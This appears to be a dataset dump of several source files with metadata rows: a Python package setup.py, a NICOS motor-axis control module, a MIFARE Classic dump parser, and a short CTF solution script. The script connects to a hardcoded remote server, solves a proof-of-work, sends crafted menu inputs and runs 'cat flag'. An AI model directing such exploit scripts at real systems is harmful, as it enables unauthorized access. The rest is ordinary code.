) | 29.611111 | 73 | 0.660413 | 61 | 533 | 5.655738 | 0.737705 | 0.069565 | 0.127536 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013605 | 0.172608 | 533 | 18 | 74 | 29.611111 | 0.768707 | 0.118199 | 0 | 0 | 0 | 0 | 0.358209 | 0.140725 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
049f5f9f41f902d0b150f604248f0afb878c2c27 | 1,490 | py | Python | setup.py | radionets-project/vipy | 792b43b77e56d085c649942180f7b83383cba73d | [
"MIT"
] | null | null | null | setup.py | radionets-project/vipy | 792b43b77e56d085c649942180f7b83383cba73d | [
"MIT"
] | 10 | 2021-02-11T08:41:40.000Z | 2021-12-01T14:59:18.000Z | setup.py | radionets-project/vipy | 792b43b77e56d085c649942180f7b83383cba73d | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
setup(
name="vipy",
version="0.0.3",
description="Simulate radio interferometer observations and visibility generation.",
url="https://github.com/radionets-project/vipy",
author="Kevin Schmidt, Felix Geyer, Stefan Fröse",
author_email="kevin3.schmidt@tu-dortmund.de",
license="MIT",
packages=find_packages(),
install_requires=[
"numpy",
"astropy",
"matplotlib",
"ipython",
"scipy",
"pandas",
"toml",
"pytest",
"pytest-cov",
"jupyter",
"astroplan",
"torch",
"tqdm",
],
setup_requires=["pytest-runner"],
tests_require=["pytest"],
zip_safe=False,
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Scientific/Engineering :: Astronomy",
"Topic :: Scientific/Engineering :: Physics",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Scientific/Engineering :: Information Analysis",
],
)
| 31.702128 | 88 | 0.587919 | 135 | 1,490 | 6.437037 | 0.681481 | 0.109321 | 0.143844 | 0.119678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011019 | 0.269128 | 1,490 | 46 | 89 | 32.391304 | 0.786961 | 0 | 0 | 0.044444 | 0 | 0 | 0.567114 | 0.078523 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.022222 | 0 | 0.022222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04a0d2b92a66841497b189be82e766ad06751727 | 9,152 | py | Python | nicos/devices/taco/axis.py | ess-dmsc/nicos | 755d61d403ff7123f804c45fc80c7ff4d762993b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 1 | 2021-03-26T10:30:45.000Z | 2021-03-26T10:30:45.000Z | nicos/devices/taco/axis.py | ess-dmsc/nicos | 755d61d403ff7123f804c45fc80c7ff4d762993b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 91 | 2020-08-18T09:20:26.000Z | 2022-02-01T11:07:14.000Z | nicos/devices/taco/axis.py | ess-dmsc/nicos | 755d61d403ff7123f804c45fc80c7ff4d762993b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 3 | 2020-08-04T18:35:05.000Z | 2021-04-16T11:22:08.000Z | # -*- coding: utf-8 -*-
# *****************************************************************************
# NICOS, the Networked Instrument Control System of the MLZ
# Copyright (c) 2009-2021 by the NICOS contributors (see AUTHORS)
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Module authors:
# Jens Krüger <jens.krueger@frm2.tum.de>
# Georg Brandl <g.brandl@fz-juelich.de>
#
# *****************************************************************************
"""NICOS axis classes."""
import TACOStates # pylint: disable=import-error
from Motor import Motor as TACOMotor # pylint: disable=import-error
from nicos import session
from nicos.core import ADMIN, SLAVE, Attach, ModeError, Moveable, Param, \
anytype, oneof, requires, status, tupleof, usermethod
from nicos.devices.abstract import Axis as AbstractAxis, CanReference
from nicos.devices.generic.sequence import SeqCall, SeqDev, SeqSleep, \
SequencerMixin
from nicos.devices.taco.core import TacoDevice
class Axis(CanReference, TacoDevice, AbstractAxis):
"""Interface for TACO Axis server devices."""
taco_class = TACOMotor
_TACO_STATUS_MAPPING = dict(TacoDevice._TACO_STATUS_MAPPING)
_TACO_STATUS_MAPPING[TACOStates.INIT] = (status.BUSY, 'referencing')
_TACO_STATUS_MAPPING[TACOStates.RESETTING] = (status.BUSY, 'referencing')
_TACO_STATUS_MAPPING[TACOStates.ALARM] = (status.NOTREACHED, 'position not reached')
parameters = {
'speed': Param('Motor speed', unit='main/s', settable=True),
'accel': Param('Motor acceleration', unit='main/s^2',
settable=True),
'refspeed': Param('Speed driving to reference switch', unit='main/s',
settable=True),
'refswitch': Param('Switch to use as reference', type=str,
settable=True),
'refpos': Param('Position of the reference switch', unit='main',
settable=True),
# do not call deviceReset by default as it does a reference drive
'resetcall': Param('What TACO method to call on reset (deviceInit or '
'deviceReset)', settable=True, default='deviceInit',
type=oneof('deviceInit', 'deviceReset')),
}
def doStart(self, target):
self._taco_guard(self._dev.start, target + self.offset)
def doRead(self, maxage=0):
return self._taco_guard(self._dev.read) - self.offset
def doTime(self, old_value, target):
s, v, a = abs(old_value - target), self.speed, self.accel
if v <= 0 or a <= 0:
return 0
if s > v**2 / a: # do we reach nominal speed?
return s / v + v / a
return 2 * (s / a)**0.5
def doReset(self):
self._taco_reset(self._dev, self.resetcall)
@usermethod
@requires(level=ADMIN, helpmsg='use adjust() to set a new offset')
def setPosition(self, pos):
"""Sets the current position of the axis to the target.
This operation is forbidden in slave mode, and does the right thing
virtually in simulation mode.
"""
if self._mode == SLAVE:
raise ModeError(self, 'setting new position not possible in '
'slave mode')
elif self._sim_intercept:
self._sim_setValue(pos)
return
self._taco_guard(self._dev.setpos, pos)
# update current value in cache
self.read(0)
def doStop(self):
self._taco_guard(self._dev.stop)
def doReference(self):
"""Do a reference drive of the axis (do not use with encoded axes)."""
self.log.info('referencing the axis, please wait...')
self._taco_guard(self._dev.deviceReset)
while self._taco_guard(self._dev.deviceState) \
in (TACOStates.INIT, TACOStates.RESETTING):
session.delay(0.3)
if self._taco_guard(self._dev.isDeviceOff):
self._taco_guard(self._dev.deviceOn)
if self.read() != self.refpos:
self._taco_guard(self._dev.setpos, self.refpos)
def doReadSpeed(self):
return self._taco_guard(self._dev.speed)
def doWriteSpeed(self, value):
self._taco_guard(self._dev.setSpeed, value)
def doReadDragerror(self):
return float(self._taco_guard(
self._dev.deviceQueryResource, 'dragerror'))
def doWriteDragerror(self, value):
self._taco_update_resource('dragerror', str(value))
def doReadPrecision(self):
return float(self._taco_guard(
self._dev.deviceQueryResource, 'precision'))
def doWritePrecision(self, value):
self._taco_update_resource('precision', str(value))
def doReadMaxtries(self):
return int(self._taco_guard(
self._dev.deviceQueryResource, 'maxtries'))
def doWriteMaxtries(self, value):
self._taco_update_resource('maxtries', str(value))
def doReadLoopdelay(self):
return float(self._taco_guard(
self._dev.deviceQueryResource, 'loopdelay'))
def doWriteLoopdelay(self, value):
self._taco_update_resource('loopdelay', str(value))
def doReadBacklash(self):
return float(self._taco_guard(
self._dev.deviceQueryResource, 'backlash'))
def doWriteBacklash(self, value):
self._taco_update_resource('backlash', str(value))
# resources that need to be set on the motor, not the axis device
def _readMotorParam(self, resource, conv=float):
motorname = self._taco_guard(self._dev.deviceQueryResource, 'motor')
client = TACOMotor(motorname)
return conv(client.deviceQueryResource(resource))
def _writeMotorParam(self, resource, value):
motorname = self._taco_guard(self._dev.deviceQueryResource, 'motor')
client = TACOMotor(motorname)
client.deviceOff()
try:
client.deviceUpdateResource(resource, str(value))
finally:
client.deviceOn()
def doReadAccel(self):
return self._readMotorParam('accel')
def doWriteAccel(self, value):
self._writeMotorParam('accel', value)
def doReadRefspeed(self):
return self._readMotorParam('refspeed')
def doWriteRefspeed(self, value):
self._writeMotorParam('refspeed', value)
def doReadRefswitch(self):
return self._readMotorParam('refswitch', str)
def doWriteRefswitch(self, value):
self._writeMotorParam('refswitch', value)
def doReadRefpos(self):
return self._readMotorParam('refpos')
def doWriteRefpos(self, value):
self._writeMotorParam('refpos', value)
class HoveringAxis(SequencerMixin, Axis):
"""An axis that also controls air for airpads."""
attached_devices = {
'switch': Attach('The device used for switching air on and off', Moveable),
}
parameters = {
'startdelay': Param('Delay after switching on air', type=float,
mandatory=True, unit='s'),
'stopdelay': Param('Delay before switching off air', type=float,
mandatory=True, unit='s'),
'switchvalues': Param('(off, on) values to write to switch device',
type=tupleof(anytype, anytype), default=(0, 1)),
}
hardware_access = True
def _generateSequence(self, target):
return [
SeqDev(self._attached_switch, self.switchvalues[1]),
SeqSleep(self.startdelay),
SeqCall(Axis.doStart, self, target),
SeqCall(self._hw_wait),
SeqSleep(self.stopdelay),
SeqDev(self._attached_switch, self.switchvalues[0]),
]
def _hw_wait(self):
# overridden: query Axis status, not HoveringAxis status
while Axis.doStatus(self, 0)[0] == status.BUSY:
session.delay(self._base_loop_delay)
def doStart(self, target):
if self._seq_is_running():
self.stop()
self.log.info('waiting for axis to stop...')
self.wait()
if abs(target - self.read()) < self.precision:
return
self._startSequence(self._generateSequence(target))
def doStop(self):
# stop only the axis, but the sequence has to run through
Axis.doStop(self)
def doTime(self, old_value, target):
return Axis.doTime(
self, old_value, target) + self.startdelay + self.stopdelay
| 37.052632 | 88 | 0.631556 | 1,056 | 9,152 | 5.354167 | 0.303977 | 0.033958 | 0.041387 | 0.054121 | 0.231341 | 0.180403 | 0.093031 | 0.06544 | 0.06544 | 0.027237 | 0 | 0.006265 | 0.25 | 9,152 | 246 | 89 | 37.203252 | 0.817453 | 0.190887 | 0 | 0.15 | 0 | 0 | 0.108835 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2125 | false | 0 | 0.04375 | 0.08125 | 0.425 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04a85192c223afca54121d60e415bd78114d791a | 459 | py | Python | Balsn_CTF_2019/Need_some_flags/solution/Need_some_flags_2_exp.py | sces60107/My-CTF-Challenges | 85fe38f31b416e232e5c6ea80eb7a9c69cb5dd5f | [
"MIT"
] | 3 | 2019-10-11T15:45:23.000Z | 2019-10-16T05:42:32.000Z | Balsn_CTF_2019/Need_some_flags/solution/Need_some_flags_2_exp.py | sces60107/My-CTF-Challenges | 85fe38f31b416e232e5c6ea80eb7a9c69cb5dd5f | [
"MIT"
] | null | null | null | Balsn_CTF_2019/Need_some_flags/solution/Need_some_flags_2_exp.py | sces60107/My-CTF-Challenges | 85fe38f31b416e232e5c6ea80eb7a9c69cb5dd5f | [
"MIT"
] | null | null | null | from pwn import *
import hashlib
r=remote("18.205.38.120",10122)
## pow
temp=r.recvuntil("sha256( ")
prefix=r.recvline().split()[0]
i=0
while True:
data=prefix+str(i)
Hash=hashlib.sha256(data)
if Hash.hexdigest()[:5]=="0"*5:
r.sendline(str(i))
break
i+=1
## get flag
r.sendline("0")
r.sendline("system")
r.sendline("1")
r.sendline("nonsecret.pyc")
r.sendline("b013")
r.sendline("92")
r.sendline("3")
r.sendline("cat flag")
r.interactive()
| 15.827586 | 33 | 0.655773 | 77 | 459 | 3.909091 | 0.532468 | 0.269103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086634 | 0.119826 | 459 | 28 | 34 | 16.392857 | 0.658416 | 0.026144 | 0 | 0 | 0 | 0 | 0.131222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
04b4ad9fcdad3b668ebfdad4cb2989d436e7b726 | 32,672 | py | Python | src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/hardware/mifare/mifare_classic.py | SabheeR/hobbits | 8bfb997940c73467af2ceb0275c470b763d2c1bf | [
"MIT"
] | 304 | 2020-02-07T21:05:22.000Z | 2022-03-24T05:30:37.000Z | src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/hardware/mifare/mifare_classic.py | SabheeR/hobbits | 8bfb997940c73467af2ceb0275c470b763d2c1bf | [
"MIT"
] | 2,107 | 2019-11-05T09:26:16.000Z | 2022-02-14T13:35:36.000Z | src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/hardware/mifare/mifare_classic.py | SabheeR/hobbits | 8bfb997940c73467af2ceb0275c470b763d2c1bf | [
"MIT"
] | 30 | 2020-03-11T14:36:43.000Z | 2022-03-07T04:45:17.000Z | # This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
import collections
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class MifareClassic(KaitaiStruct):
"""You can get a dump for testing by the link: https://github.com/zhovner/mfdread/raw/master/dump.mfd
.. seealso::
Source - https://github.com/nfc-tools/libnfc
https://www.nxp.com/docs/en/data-sheet/MF1S70YYX_V1.pdf
"""
SEQ_FIELDS = ["sectors"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['sectors']['start'] = self._io.pos()
self._raw_sectors = []
self.sectors = []
i = 0
while not self._io.is_eof():
if not 'arr' in self._debug['sectors']:
self._debug['sectors']['arr'] = []
self._debug['sectors']['arr'].append({'start': self._io.pos()})
self._raw_sectors.append(self._io.read_bytes((((4 if i >= 32 else 1) * 4) * 16)))
_io__raw_sectors = KaitaiStream(BytesIO(self._raw_sectors[-1]))
_t_sectors = MifareClassic.Sector(i == 0, _io__raw_sectors, self, self._root)
_t_sectors._read()
self.sectors.append(_t_sectors)
self._debug['sectors']['arr'][len(self.sectors) - 1]['end'] = self._io.pos()
i += 1
self._debug['sectors']['end'] = self._io.pos()
class Key(KaitaiStruct):
SEQ_FIELDS = ["key"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['key']['start'] = self._io.pos()
self.key = self._io.read_bytes(6)
self._debug['key']['end'] = self._io.pos()
class Sector(KaitaiStruct):
SEQ_FIELDS = ["manufacturer", "data_filler", "trailer"]
def __init__(self, has_manufacturer, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.has_manufacturer = has_manufacturer
self._debug = collections.defaultdict(dict)
def _read(self):
if self.has_manufacturer:
self._debug['manufacturer']['start'] = self._io.pos()
self.manufacturer = MifareClassic.Manufacturer(self._io, self, self._root)
self.manufacturer._read()
self._debug['manufacturer']['end'] = self._io.pos()
self._debug['data_filler']['start'] = self._io.pos()
self._raw_data_filler = self._io.read_bytes(((self._io.size() - self._io.pos()) - 16))
_io__raw_data_filler = KaitaiStream(BytesIO(self._raw_data_filler))
self.data_filler = MifareClassic.Sector.Filler(_io__raw_data_filler, self, self._root)
self.data_filler._read()
self._debug['data_filler']['end'] = self._io.pos()
self._debug['trailer']['start'] = self._io.pos()
self.trailer = MifareClassic.Trailer(self._io, self, self._root)
self.trailer._read()
self._debug['trailer']['end'] = self._io.pos()
class Values(KaitaiStruct):
SEQ_FIELDS = ["values"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['values']['start'] = self._io.pos()
self.values = []
i = 0
while not self._io.is_eof():
if not 'arr' in self._debug['values']:
self._debug['values']['arr'] = []
self._debug['values']['arr'].append({'start': self._io.pos()})
_t_values = MifareClassic.Sector.Values.ValueBlock(self._io, self, self._root)
_t_values._read()
self.values.append(_t_values)
self._debug['values']['arr'][len(self.values) - 1]['end'] = self._io.pos()
i += 1
self._debug['values']['end'] = self._io.pos()
class ValueBlock(KaitaiStruct):
SEQ_FIELDS = ["valuez", "addrz"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['valuez']['start'] = self._io.pos()
self.valuez = [None] * (3)
for i in range(3):
if not 'arr' in self._debug['valuez']:
self._debug['valuez']['arr'] = []
self._debug['valuez']['arr'].append({'start': self._io.pos()})
self.valuez[i] = self._io.read_u4le()
self._debug['valuez']['arr'][i]['end'] = self._io.pos()
self._debug['valuez']['end'] = self._io.pos()
self._debug['addrz']['start'] = self._io.pos()
self.addrz = [None] * (4)
for i in range(4):
if not 'arr' in self._debug['addrz']:
self._debug['addrz']['arr'] = []
self._debug['addrz']['arr'].append({'start': self._io.pos()})
self.addrz[i] = self._io.read_u1()
self._debug['addrz']['arr'][i]['end'] = self._io.pos()
self._debug['addrz']['end'] = self._io.pos()
@property
def addr(self):
if hasattr(self, '_m_addr'):
return self._m_addr if hasattr(self, '_m_addr') else None
if self.valid:
self._m_addr = self.addrz[0]
return self._m_addr if hasattr(self, '_m_addr') else None
@property
def addr_valid(self):
if hasattr(self, '_m_addr_valid'):
return self._m_addr_valid if hasattr(self, '_m_addr_valid') else None
self._m_addr_valid = ((self.addrz[0] == ~(self.addrz[1])) and (self.addrz[0] == self.addrz[2]) and (self.addrz[1] == self.addrz[3]))
return self._m_addr_valid if hasattr(self, '_m_addr_valid') else None
@property
def valid(self):
if hasattr(self, '_m_valid'):
return self._m_valid if hasattr(self, '_m_valid') else None
self._m_valid = ((self.value_valid) and (self.addr_valid))
return self._m_valid if hasattr(self, '_m_valid') else None
@property
def value_valid(self):
if hasattr(self, '_m_value_valid'):
return self._m_value_valid if hasattr(self, '_m_value_valid') else None
self._m_value_valid = ((self.valuez[0] == ~(self.valuez[1])) and (self.valuez[0] == self.valuez[2]))
return self._m_value_valid if hasattr(self, '_m_value_valid') else None
@property
def value(self):
if hasattr(self, '_m_value'):
return self._m_value if hasattr(self, '_m_value') else None
if self.valid:
self._m_value = self.valuez[0]
return self._m_value if hasattr(self, '_m_value') else None
class Filler(KaitaiStruct):
"""only to create _io."""
SEQ_FIELDS = ["data"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['data']['start'] = self._io.pos()
self.data = self._io.read_bytes(self._io.size())
self._debug['data']['end'] = self._io.pos()
@property
def block_size(self):
if hasattr(self, '_m_block_size'):
return self._m_block_size if hasattr(self, '_m_block_size') else None
self._m_block_size = 16
return self._m_block_size if hasattr(self, '_m_block_size') else None
@property
def data(self):
if hasattr(self, '_m_data'):
return self._m_data if hasattr(self, '_m_data') else None
self._m_data = self.data_filler.data
return self._m_data if hasattr(self, '_m_data') else None
@property
def blocks(self):
if hasattr(self, '_m_blocks'):
return self._m_blocks if hasattr(self, '_m_blocks') else None
io = self.data_filler._io
_pos = io.pos()
io.seek(0)
self._debug['_m_blocks']['start'] = io.pos()
self._m_blocks = []
i = 0
while not io.is_eof():
if not 'arr' in self._debug['_m_blocks']:
self._debug['_m_blocks']['arr'] = []
self._debug['_m_blocks']['arr'].append({'start': io.pos()})
self._m_blocks.append(io.read_bytes(self.block_size))
self._debug['_m_blocks']['arr'][len(self._m_blocks) - 1]['end'] = io.pos()
i += 1
self._debug['_m_blocks']['end'] = io.pos()
io.seek(_pos)
return self._m_blocks if hasattr(self, '_m_blocks') else None
@property
def values(self):
if hasattr(self, '_m_values'):
return self._m_values if hasattr(self, '_m_values') else None
io = self.data_filler._io
_pos = io.pos()
io.seek(0)
self._debug['_m_values']['start'] = io.pos()
self._m_values = MifareClassic.Sector.Values(io, self, self._root)
self._m_values._read()
self._debug['_m_values']['end'] = io.pos()
io.seek(_pos)
return self._m_values if hasattr(self, '_m_values') else None
class Manufacturer(KaitaiStruct):
SEQ_FIELDS = ["nuid", "bcc", "sak", "atqa", "manufacturer"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['nuid']['start'] = self._io.pos()
self.nuid = self._io.read_u4le()
self._debug['nuid']['end'] = self._io.pos()
self._debug['bcc']['start'] = self._io.pos()
self.bcc = self._io.read_u1()
self._debug['bcc']['end'] = self._io.pos()
self._debug['sak']['start'] = self._io.pos()
self.sak = self._io.read_u1()
self._debug['sak']['end'] = self._io.pos()
self._debug['atqa']['start'] = self._io.pos()
self.atqa = self._io.read_u2le()
self._debug['atqa']['end'] = self._io.pos()
self._debug['manufacturer']['start'] = self._io.pos()
self.manufacturer = self._io.read_bytes(8)
self._debug['manufacturer']['end'] = self._io.pos()
class Trailer(KaitaiStruct):
SEQ_FIELDS = ["key_a", "access_bits", "user_byte", "key_b"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['key_a']['start'] = self._io.pos()
self.key_a = MifareClassic.Key(self._io, self, self._root)
self.key_a._read()
self._debug['key_a']['end'] = self._io.pos()
self._debug['access_bits']['start'] = self._io.pos()
self._raw_access_bits = self._io.read_bytes(3)
_io__raw_access_bits = KaitaiStream(BytesIO(self._raw_access_bits))
self.access_bits = MifareClassic.Trailer.AccessConditions(_io__raw_access_bits, self, self._root)
self.access_bits._read()
self._debug['access_bits']['end'] = self._io.pos()
self._debug['user_byte']['start'] = self._io.pos()
self.user_byte = self._io.read_u1()
self._debug['user_byte']['end'] = self._io.pos()
self._debug['key_b']['start'] = self._io.pos()
self.key_b = MifareClassic.Key(self._io, self, self._root)
self.key_b._read()
self._debug['key_b']['end'] = self._io.pos()
class AccessConditions(KaitaiStruct):
SEQ_FIELDS = ["raw_chunks"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['raw_chunks']['start'] = self._io.pos()
self.raw_chunks = [None] * (self._parent.ac_count_of_chunks)
for i in range(self._parent.ac_count_of_chunks):
if not 'arr' in self._debug['raw_chunks']:
self._debug['raw_chunks']['arr'] = []
self._debug['raw_chunks']['arr'].append({'start': self._io.pos()})
self.raw_chunks[i] = self._io.read_bits_int_be(4)
self._debug['raw_chunks']['arr'][i]['end'] = self._io.pos()
self._debug['raw_chunks']['end'] = self._io.pos()
class TrailerAc(KaitaiStruct):
SEQ_FIELDS = []
def __init__(self, ac, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.ac = ac
self._debug = collections.defaultdict(dict)
def _read(self):
pass
@property
def can_read_key_b(self):
"""key A is required."""
if hasattr(self, '_m_can_read_key_b'):
return self._m_can_read_key_b if hasattr(self, '_m_can_read_key_b') else None
self._m_can_read_key_b = self.ac.inv_shift_val <= 2
return self._m_can_read_key_b if hasattr(self, '_m_can_read_key_b') else None
@property
def can_write_keys(self):
if hasattr(self, '_m_can_write_keys'):
return self._m_can_write_keys if hasattr(self, '_m_can_write_keys') else None
self._m_can_write_keys = ((((self.ac.inv_shift_val + 1) % 3) != 0) and (self.ac.inv_shift_val < 6))
return self._m_can_write_keys if hasattr(self, '_m_can_write_keys') else None
@property
def can_write_access_bits(self):
if hasattr(self, '_m_can_write_access_bits'):
return self._m_can_write_access_bits if hasattr(self, '_m_can_write_access_bits') else None
self._m_can_write_access_bits = self.ac.bits[2].b
return self._m_can_write_access_bits if hasattr(self, '_m_can_write_access_bits') else None
@property
def key_b_controls_write(self):
if hasattr(self, '_m_key_b_controls_write'):
return self._m_key_b_controls_write if hasattr(self, '_m_key_b_controls_write') else None
self._m_key_b_controls_write = not (self.can_read_key_b)
return self._m_key_b_controls_write if hasattr(self, '_m_key_b_controls_write') else None
class ChunkBitRemap(KaitaiStruct):
SEQ_FIELDS = []
def __init__(self, bit_no, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.bit_no = bit_no
self._debug = collections.defaultdict(dict)
def _read(self):
pass
@property
def shift_value(self):
if hasattr(self, '_m_shift_value'):
return self._m_shift_value if hasattr(self, '_m_shift_value') else None
self._m_shift_value = (-1 if self.bit_no == 1 else 1)
return self._m_shift_value if hasattr(self, '_m_shift_value') else None
@property
def chunk_no(self):
if hasattr(self, '_m_chunk_no'):
return self._m_chunk_no if hasattr(self, '_m_chunk_no') else None
self._m_chunk_no = (((self.inv_chunk_no + self.shift_value) + self._parent._parent.ac_count_of_chunks) % self._parent._parent.ac_count_of_chunks)
return self._m_chunk_no if hasattr(self, '_m_chunk_no') else None
@property
def inv_chunk_no(self):
if hasattr(self, '_m_inv_chunk_no'):
return self._m_inv_chunk_no if hasattr(self, '_m_inv_chunk_no') else None
self._m_inv_chunk_no = (self.bit_no + self.shift_value)
return self._m_inv_chunk_no if hasattr(self, '_m_inv_chunk_no') else None
class DataAc(KaitaiStruct):
SEQ_FIELDS = []
def __init__(self, ac, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.ac = ac
self._debug = collections.defaultdict(dict)
def _read(self):
pass
@property
def read_key_a_required(self):
if hasattr(self, '_m_read_key_a_required'):
return self._m_read_key_a_required if hasattr(self, '_m_read_key_a_required') else None
self._m_read_key_a_required = self.ac.val <= 4
return self._m_read_key_a_required if hasattr(self, '_m_read_key_a_required') else None
@property
def write_key_b_required(self):
if hasattr(self, '_m_write_key_b_required'):
return self._m_write_key_b_required if hasattr(self, '_m_write_key_b_required') else None
self._m_write_key_b_required = (( ((not (self.read_key_a_required)) or (self.read_key_b_required)) ) and (not (self.ac.bits[0].b)))
return self._m_write_key_b_required if hasattr(self, '_m_write_key_b_required') else None
@property
def write_key_a_required(self):
if hasattr(self, '_m_write_key_a_required'):
return self._m_write_key_a_required if hasattr(self, '_m_write_key_a_required') else None
self._m_write_key_a_required = self.ac.val == 0
return self._m_write_key_a_required if hasattr(self, '_m_write_key_a_required') else None
@property
def read_key_b_required(self):
if hasattr(self, '_m_read_key_b_required'):
return self._m_read_key_b_required if hasattr(self, '_m_read_key_b_required') else None
self._m_read_key_b_required = self.ac.val <= 6
return self._m_read_key_b_required if hasattr(self, '_m_read_key_b_required') else None
@property
def decrement_available(self):
if hasattr(self, '_m_decrement_available'):
return self._m_decrement_available if hasattr(self, '_m_decrement_available') else None
self._m_decrement_available = (( ((self.ac.bits[1].b) or (not (self.ac.bits[0].b))) ) and (not (self.ac.bits[2].b)))
return self._m_decrement_available if hasattr(self, '_m_decrement_available') else None
@property
def increment_available(self):
if hasattr(self, '_m_increment_available'):
return self._m_increment_available if hasattr(self, '_m_increment_available') else None
self._m_increment_available = (( ((not (self.ac.bits[0].b)) and (not (self.read_key_a_required)) and (not (self.read_key_b_required))) ) or ( ((not (self.ac.bits[0].b)) and (self.read_key_a_required) and (self.read_key_b_required)) ))
return self._m_increment_available if hasattr(self, '_m_increment_available') else None
class Ac(KaitaiStruct):
SEQ_FIELDS = []
def __init__(self, index, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.index = index
self._debug = collections.defaultdict(dict)
def _read(self):
pass
class AcBit(KaitaiStruct):
SEQ_FIELDS = []
def __init__(self, i, chunk, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.i = i
self.chunk = chunk
self._debug = collections.defaultdict(dict)
def _read(self):
pass
@property
def n(self):
if hasattr(self, '_m_n'):
return self._m_n if hasattr(self, '_m_n') else None
self._m_n = ((self.chunk >> self.i) & 1)
return self._m_n if hasattr(self, '_m_n') else None
@property
def b(self):
if hasattr(self, '_m_b'):
return self._m_b if hasattr(self, '_m_b') else None
self._m_b = self.n == 1
return self._m_b if hasattr(self, '_m_b') else None
@property
def bits(self):
if hasattr(self, '_m_bits'):
return self._m_bits if hasattr(self, '_m_bits') else None
_pos = self._io.pos()
self._io.seek(0)
self._debug['_m_bits']['start'] = self._io.pos()
self._m_bits = [None] * (self._parent._parent.ac_bits)
